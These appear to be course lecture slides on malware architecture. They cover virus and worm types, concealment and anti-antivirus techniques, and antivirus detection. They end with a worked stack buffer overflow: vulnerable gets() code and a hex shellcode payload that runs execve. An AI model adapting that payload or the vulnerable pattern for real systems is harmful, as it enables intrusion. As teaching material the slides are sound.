Malware Architecture COEN 250
Dec 25, 2015
Malware Types
Self-replicating malwareCreates new instances of itself In contrast to passive replication
Population growthChanges in number of instances
Parasitic malwareRequires some other executable code to exist
Malware Types
Logic Bomb not self-replicating, zero population growth, possibly
parasitic Consists of
Payload An action to be performed
Trigger Boolean condition to be executed
Example: If Thomas Schwarz is not getting paid then delete the COEN
website.
Malware Types
Trojan Horse parasitic Program that purports doing something benign But secretely performs a malicious task Example:
Authentic looking login page with username and password prompt
Stores result in a file, exits user, so that true login page appears
Malware Types
Backdoor Mechanism that bypasses normal security checks
Virus Self-replicating Positive Population Growth Parasitic Runs when a certain executable runs Infects other executables
Traveling on same system, floppy, CD, DVD, USB First mentioned in SF novel “The Scarred Man” Gregory
Benford, 1970
Malware Types
Wormself-replicatingpositive population growthnot parasiticSpread from machine to machine across a
network
Malware Types
RabbitsTries to consume all system resources by
multiplying quickly Fork bomb
A worm that deletes itself after infecting another machine
Worm hops from machine to machine
Malware Types
Spyware Software that collects information from a
system and transmits it to someone else. Addware
Spyware that presents adds.
Virus
Viruses consist of Infection Mechanism
Can be multipartite
Trigger (optional)Payload (optional)
Virus
Target Classification Boot-Sector Infectors File Infectors Macro Viruses
Concealment Strategy Classification No Concealment Encryption Stealth Oligomorphism, Polymorphism, Metamorphism
Virus: Boot Sector Infectors
Contains code that runs when a system starts up.
Volume Boot RecordFirst sector of an unpartitioned storage deviceFirst sector of an individual partition
Master Boot RecordFirst sector of data storage device that has
been partitioned
Virus: Boot Sector Infectors
Booting: Bootstrap loader
Loads software to start OS Multi-stage bootstrap loader Boot sequence on IBM-PC
Runs instruction at memory location F000:FFF0 of BIOS Jumps to execution of BIOS startup program Executes Power-On Self-Test (POST)
Checks, initializes devices Goes through preconfigured list of devices If it finds bootable device, loads, and executes boot sector
Assume MBR on hard drive MBR contains address of bootable partition Load boot sector of bootable partition Boot sector moves OS kernel into memory and starts it
Virus: Boot Sector Infectors
Boot Sector Infector Copies itself into the MBR or VBR Typically after making copy of MBR in a “safe
location” Michelangelo:
April 1991 Moves original boot sector to safe location Infects all floppy disks inserted into computer Payload:
overwrites file system with zeroes Extinct in the wild
Virus: Boot Sector Infectors
Boot Sector Infector Stoned Virus
Original version infects only 360KB diskettes 1988 Many variants Behavior
Becomes memory resident Disables interrupt 12 Infects MBR Infects all diskettes
Moves boot sector to sector 11 and copies itself into sector 0 Same values as chosen by Michelangelo, so that computers infected with
both became immediately dysfunctional Usually destroys part of the file system
Payload: Displays message during boot process: “Your PC is now Stoned! Your computer is now stoned.
Virus: Boot Sector Infectors
Extinct in the wild:Floppies are rarely used to boot, disabling the
propagation mechanismOS prevent writing to a disk’s boot sector
without proper authorizationBIOS can enable boot block protection
Virus: File Infectors
Virus infects executablesVirus is placed in an executable
Prepending Virus: At the beginning Execution of a *.com loads file into memory Set PC to beginning of file Often copies infected file further down
Virus: File Infectors Appending Virus: At the end
To get control Save original instruction in code, replace by jump to viral
code, execute virus, restore original instruction and jump to them or run original instruction at saved location followed by jump to the rest of the code
Executable file formats can specify start location in file header
Virus: File Infectors
Overwriting Viruses Atop original code Does not change file size Virus gets control in normal execution of file Placement Strategies:
Place virus in superfluous data Place virus in file slack or unused allocated file space Stash overwritten contents in a companion file Compress (parts of) the original file, decompress
Virus: File Infectors
Inserting VirusMove target code out of way Intersperse small pieces of virus with infected
file Companion Virus
Virus gets executed before infected file Infected file barely changed
Virus: File Infectors
Companion Virus Example Change name of target file
Copy notepad.exe to notepad.exp Virus is in new notepad.exe, which calls notepad.exp
Virus placed earlier in search path notepad.exe in a different directory than real notepad.exe notepad.com is executed before notepad.exe
Use Windows registry to change association for .exe files Change “interpreter in ELF files
Typically the run-time linker, but now virus Associate icon of target with virus
Virus: Macro Virus
MacrosCode that is part of documents.Used extensively in MS Office Tools
Written in or translated to Visual Basic for Applications (VBA) code
Macro VirusChanges or creates new macro
Virus: Macro Virus
Example:Concept 1995-1997 Infects Word’s global document-template
NORMAL.DOT Creates PayLoad and FileSaveAs macros Infects all documents saved with the Save As
command
Virus: Macro Virus
Example: Laroux1996 – Excel macro virusConsists of auto_open and check_files
auto_open executes whenever an infected spreadsheet is opened, followed by check_files
Virus looks for PERSONAL.XLS
Virus contains no malicious payload
Virus: Macro Virus
Protective StrategiesLater versions of MS Office have security
levels for execution of macros Level high only executes signed macros
MS Office provides warnings when files contain macros
ScanProt (Word prior to 7.0a) scans for the Concept virus
Virus: Concealment
EncryptionVirus body is encrypted to make it harder to
detectVirus needs to contain a decryption engineEncryption methods range from very simple to
strong
Virus: Concealment
Stealth Virus takes active steps to conceal infection
Restore original file timestamp Intercept system calls to play back original information of file
Change I/O calls in DOS Change system libraries in more sophisticated OS Run rootkit
Anti-stealth virus Virus makes all files look infected Payload: Anti-virus software deletes all other files
Virus: Concealment
Oligomorphism Encrypted virus changes encryption key between infections Infected files have different file signatures
Polymorphism Virus also changes decryption engine
By using equivalent instruction sequences By using different versions
Tremor had 6 decryption engines Makes it difficult for virus to detect its presence
Virus can use specific timestamp (e.g. add 100 to file year) Pad file sizes of infected files to a certain value Use hidden flags in ELF format Use metadata or alternative data streams (in NTFS) Store data in registry or other location
Virus: Concealment
Hiding Decryptor Engine Using a mutation engine
Instruction equivalence All these set register r0 to zero:
clear r0 xor r0,r0 and 0, r0 move 0, r0
Instruction sequence equivalence Instruction reordering Register renaming Data reordering Spaghetti code Junk code insertion Run-time code generation Use a virtual machine Use concurrent threads to make analysis difficult Inlining, outlining, call sequence changes
Virus: Antivirus TechniquesStatic Detection Mechanism
On-demand / On –access scanning Virus signatures a.k.a scan strings:
Identifying substrings in infected codeProblem: How to search for many patterns at
once Static Heuristics
Positive HeuristicsNegative Heuristics
Virus: Antivirus TechniquesStatic Detection Mechanism
Positive Heuristics (Boosters) Junk code Decryption loops Self-modifying code Use of undocumented API Manipulation of interrupt vectors Unusual instructions, especially those not emitted by a compiler Strings containing obscenities or “virus” Difference between entry point and end of file Spectral analysis
Frequency analysis of instructions
Virus: Antivirus TechniquesStatic Detection Mechanism
Negative heuristics = stoppersuser inputGUI popups
AnalysisWeighted measure
trained by good and bad setsNeural networksData mining
Virus: Antivirus TechniquesStatic Detection Mechanism
Integrity Checks Tripwire:
Calculate cryptographically secure hash of all system files Store it in unchangable directory
E.g. CD-ROM Scan periodically to check integrity of all system files Updates:
Check integrity of system Patch system Calculate new checksums
Self-checking of antivirus software
Virus: Antivirus TechniquesDynamic Methods
Behavior blockers: Software monitors running program in real time Watches for suspicious activity such as file system
accesses Appending virus opens executable for reading and writing Generates activity signature of bad pattern:
open, read, write, seek to end, appending, close
Use notion of ownership to prevent too many false positives
Virus: Antivirus Techniques Dynamic Methods
Emulation Analyze code before letting it run
Emulation uses dynamic heuristics Same as static heuristics Same as behavior blockers
Emulation uses generic decryption Use virus’ own decryption loop to scan for decrypted virus
Decryption loop should have run when: Program accesses code that it just modified 24B + of modified memory
Emulator can run signature searches some time into run-time of emulated code
Virus: Antivirus Techniques Dynamic Methods
Emulator Architecture Single stepping through a program can be detected by virus through
timing Instead:1. CPU emulation2. Memory emulation3. Hardware and OS emulation4. Emulation control
Major Issue: When to stop Number of instructions Amount of time spent emulating Proportion of instructions that modify memory Presence of stoppers
5. Post Analysis Data Instruction histogram Dead code
Virus: Antivirus Techniques Dynamic Methods
Reentering emulation:Virus code can be CPU specific. Emulation
might need to run with different CPU parameters.
Installation of interrupt handlers should trigger emulation of the interrupt handlers
Using goats to verify infective behaviorEmulator provides a goat file to suspect file to
see changes.
Virus: Antivirus TechniquesVerification and Identification
Verification reduces false positives necessary for disinfection
Difficult only with polymorphic viruses Try to decrypt virus body – X-raying
Side effect of emulating decryptor engine Breaking weak encryption
Identify using signatures known copy of virus check-summing of virus
Virus: Antivirus TechniquesQuarantine
Quarantine isolates infected file from rest of the systemOften, copying of file to a quarantine directoryTrivially encrypt file to make it unrunnableRender files in quarantine directory invisible
Virus: Antivirus TechniquesAnti-Macro Virus
Macro can change through reformattingMS Word document converter has produced
new versions of a macro virusBugs in macro virus propagation mechanism
can introduce new variantsMacro virus can incorporate other macros
Happened to a Word macro snatching two anti-virus macros from MS
Anti-Anti-Virus Techniques
Aggressively attack anti-virus software Impede anti-virus analysis by anti-virus
labs Use knowledge of anti-virus mechanisms
to avoid dectection Not anti-virus virus
“Beneficial” virus
Anti-Anti-Virus TechniquesRetrovirus
Disables anti-virus software Virus has list of process names of anti-virus products Kills any processes with these names Disables antivirus program
Ganda inspects programs that run at start-up (autorun) Replaces first instruction of identified anti-virus programs
with a return Reduce priority of anti-virus software so that it never
runs Disable look-up of antivirus software updates
Anti-Anti-Virus Techniques
Entry point obfuscation (EPO)Alternative ways of getting virus code to run
Simile, Ganda look for calls to ExitProcess API
Anti-Anti-Virus TechniquesAnti-Emulation
Outlast emulationVirus can do nothing bad for a long timeVirus only replicates randomlyEntry-point obfuscation also delays virus
execution Outsmarting emulation
Restructure viral code No longer looks like a virus
Anti-Anti-Virus TechniquesAnti-Emulation
Emulator detection Use undocumented CPU instructions
In the hope that emulator crashes on them Exploit differences in CPU Attack emulator memory system
use many memory addresses go to unusual memory locations
Test for changes between API calls E.g. emulator returns always the same time stamp
Import obscure libraries Looking for external things
Hard to emulate Check for specific emulators
Anti-Anti-Virus TechniquesArmoring, Anti-Debugging
Armoring Use anti-reverse engineering techniques to make analysis of
virus behavior difficult Detecting Debug Mode
Use debugger specific idiosyncrasies Detect breakpoint insertion
Breakpoints are implemented through system interrupts Check for single-stepping
Interrupt dumps info on stack Push on stack, then pop, see whether item is still there
Check for system time Manipulate prefetch queue in CPU
Use IsDebuggerPresent API
Anti-Anti-Virus TechniquesTunneling
Tunneling virus backtracks interrupt chain to go directly to DOS and BIOS interrupt handlers
Avoids monitoring Only possible in MS-DOS
Kernel software protected in other OS
Anti-Anti-Virus TechniquesAnti-Integrity Checking
Polymorphic virus can hide file changes against simple checksums
Slow virus only changes files that are about to be changed anyway
Worms
Worms: Propagates across a network Typically, does not require user action for
propagation.Virus: Infects files. Typically requires user interaction
Worms: Warhead
A piece of code that exploits a vulnerability on the target systemExploits such as Buffer Overflow ExploitsFile Sharing AttacksE-mailCommon Mis-configurations
Worms: Propagation Engine
After gaining access, the worm must transfer itself to the target machine.
Some worms are completely contained in the warhead. File Transfer Mechanisms
FTP TFTP HTTP SMB (MS Server Message Block)
Windows file sharing Unix servers running SAMBA
Worms: Target Selection Algorithm
Once the worm has gained control of a target, it starts looking for new targets.E-mail addressesHost listsTrusted SystemsNetwork NeighborhoodDNS queries Randomly selected ip address.
Worms: Payload
Some specific action done on behalf of the attacker.
Opening up a backdoor. Planting a distributed denial of service attack. Performing complex calculations:
password cracking math research (actually happened)
Worms: Spreading
Worm spread is limited Diversity of machines
“Tiny Worm” targeted only machines running security software from a
medium company was successful in infecting most machines with that software.
Worms can contain support for multiple entry methods.
Too many victims crash Fast worms can cause network congestion
Worm Trends:
Multiplatform worms Multiexploit worms Zero-day exploit worms
No chance to patch Fast-spreading worms: Warhol / Flash
pre-scan targets Polymorphic worms
Change appearance Metamorphic worms
Change functionality
Strings A buffer overflow occurs when data is written
outside of the boundaries of the memory allocated to a particular data structure.
SourceMemory
Allocated Memory (8 Bytes)
11 Bytes of Data
Copy Operation
Other Memory
Attacks
Strings
Buffer overflow occur because we usually do not check bounds.Standard library functions do not check
bounds.Programmers do not check bounds.
Not all buffer overflows are exploitable.
Attacks
Strings
Process Memory Organization
Code or Text: Instructions and read only data
Data: Initialized data, uninitialized data, static variables, global variables
Heap: Dynamically allocated variables
Stack: Local variables, return addresses, etc.
Attacks
When calling a subroutine / function: Stack stores the return address Stack stores arguments, return values Stack stores variables local to the subroutine
Information pushed on the stack for a subroutine call is called a frame. Address of frame is stored in the frame or base point
register. epb on Intel architectures
AttacksStack Management
#include <iostream>bool IsPasswordOkay(void){
char Password[8];
gets(Password);if (!strcmp(Password, “badprog"))
return(true);else return(false);
}void main() { bool PwStatus;
puts("Enter password:");PwStatus = IsPasswordOkay();if (PwStatus == false){
puts("Access denied");exit(-1);
}else puts("Access granted");
}
AttacksStack Management
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
…
Program stack before call to IsPasswordOkay()
puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied");
Stack
AttacksStack Management
Storage for Password (8 Bytes)
Caller EBP – Frame Ptr main (4 bytes)
Return Addr Caller – main (4 Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
…
Program stack during call to IsPasswordOkay()
puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied");
bool IsPasswordOkay(void){ char Password[8];
gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false)}
Stack
AttacksStack Management
Program stack after call to IsPasswordOkay()
puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied");
Storage for Password (8 Bytes)
Caller EBP – Frame Ptr main (4 bytes)
Return Addr Caller – main (4 Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
…
Stack
AttacksStack Management
What happens if we enter more than 7 characters of an input string?
#include <iostream>bool IsPasswordOkay(void){
char Password[8];
gets(Password);if (!strcmp(Password, “badprog"))
return(true);else return(false);
}void main() { bool PwStatus;
puts("Enter password:");PwStatus = IsPasswordOkay();if (PwStatus == false){
puts("Access denied");exit(-1);
}else puts("Access granted");
}
AttacksBuffer Overflow Attack
bool IsPasswordOkay(void){ char Password[8];
gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false)}
Storage for Password (8 Bytes)
“12345678”
Caller EBP – Frame Ptr main (4 bytes)
“9012”
Return Addr Caller – main (4 Bytes)
“3456”
Storage for PwStatus (4 bytes)
“7890”
Caller EBP – Frame Ptr OS (4 bytes)
“\0”
Return Addr of main – OS (4 Bytes)
…
Stack
The return address and other data on the stack is over written because the memory space allocated for the password can only hold a maximum 7 character plus the NULL terminator.
AttacksBuffer Overflow Attack
A specially crafted string “abcdefghijklW►*!” produced the following result:
AttacksBuffer Overflow Attack
The string “abcdefghijklW►*!” overwrote 9 extra bytes of memory on the stack changing the callers return address thus skipping the execution of line 3
Storage for Password (8 Bytes)
“abcdefgh”
Caller EBP – Frame Ptr main (4 bytes)
“ijkl”
Return Addr Caller – main (4 Bytes)
“W►*!” (return to line 4 was line 3)
Storage for PwStatus (4 bytes)
“/0”
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
Stack
Line Statement
1 puts("Enter Password:");
2 PwStatus=ISPasswordOkay();
3 if (PwStatus ==true)
4 puts("Hello, Master");
5 else puts("Access denied");
AttacksBuffer Overflow Attack
A buffer overflow can be exploited byChanging the return address in order to
change the program flow (arc-injection)Change the return address to point into the
buffer where it contains some malicious code (Code injection)
AttacksBuffer Overflow Exploit
The get password program can be exploited to execute arbitrary code by providing the following binary data file as input:
000 31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a· +"
020 31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç ·
+1"040 31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal
“
This exploit is specific to Red Hat Linux 9.0 and GCC
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The first 16 bytes of binary data fill the allocated storage space for the password. NOTE: Even though the program only allocated 12 bytes for the password, the version of the gcc compiler used allocates stack data in multiples of 16 bytes
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The next 4 bytes overwrite the return address. The new return address is 0X BF FF F9 E0 (little-endian)
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code. Purpose of malicious code is to call execve with a user
provided set of parameters. In this program, instead of spawning a shell, we just call
the linux calculator program.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code: xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word
Create a zero value and use it to NULL terminate the argument list.
This is necessary to terminate the argument list.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code: xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word mov $0xb,%al #set code for execve
Set the value of register al to 0xb. This value indicates a system call to execve.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code: mov $0xb,%al #set code for execve mov $0xbffffa03,%ebx #ptr to arg 1 mov $0xbffff9fb,%ecx #ptr to arg 2 mov 0xbffff9ff,%edx #ptr to arg 3
This puts the pointers to the arguments into ebc, ecx, and edx registers.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code: mov $0xbffffa03,%ebx #ptr to arg 1 mov $0xbffff9fb,%ecx #ptr to arg 2 mov 0xbffff9ff,%edx #ptr to arg 3 int $80 # make system call to execve
Now make the system call to execve. The arguments are in the registers.
AttacksBuffer Overflow Attack
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “
The malicious code: Last part are the arguments.
AttacksBuffer Overflow Attack
Buffer Overflow Stack
Can be prevented: Stackguard, Canaries, No-Execute Permission Heap
Much harder to prevent Pointer mistakes Dynamic Memory Management Program Flow Mistakes
integer overflow Formatted Output Vulnerability
Only in C, culprit is a printf kludge Concurrency Issues
Intervening event between check and access
AttacksPrimary C / C++ Vulnerabilities